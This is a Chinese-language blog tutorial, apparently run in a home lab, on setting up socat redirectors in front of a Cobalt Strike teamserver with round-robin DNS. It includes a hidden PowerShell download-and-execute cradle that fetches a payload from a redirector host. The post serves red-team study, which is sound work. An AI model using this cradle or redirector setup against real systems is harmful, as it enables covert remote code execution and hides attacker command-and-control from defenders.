【远控使用】Cobalt Strike使用重定器

admin 2022年1月10日03:32:55安全工具评论18 views694字阅读2分18秒阅读模式

前言

目标

image-20210901154227983

Cobalt Stike重定向

image-20210831105934755

接着下一步,就是让r1-r3这三台linux主机重定向到我们的teamserver中,可以使用socat来做

DNS系统域名 dj.com

teamserver team.dj.com 192.168.1.105

ubuntu1 r1.dj.com 192.168.1.107

ubuntu2 r2.dj.com 192.168.1.108

这回我们就不要r3了,我电脑运行太多虚拟机会卡

接着就可以用这个定义的A记录域名,直接上cs

image-20210831111049390

这里就要用到socat来进行重定向

工具socat(一款端口重定向工具)我们用它来建立80端口上的连接管理,并且继续在80端口运行那个连接团队服务器的连接。

1
socat TCP4-LISTEN:80,fork TCP4:team.dj.com:80

直接用apt安装socat

1
apt-get install socat

接着r1,r2执行这个命令,如果端口被占用可以关掉服务,我这边是关掉apache2

1
/etc/init.d/apache2 stop

image-20210831223456896

打开cs,创建一个监听窗口,让他访问我们的第一个A地址解析的r1

image-20210901154530913

设置我们所有A记录被轮流访问

image-20210901155233076

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r1.dj.com:80/a'))"

image-20210901053743593

接着就能实现每个A轮流返回powershell

image-20210901204359074

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【远控使用】Cobalt Strike使用重定器 http://cn-sec.com/archives/730003.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: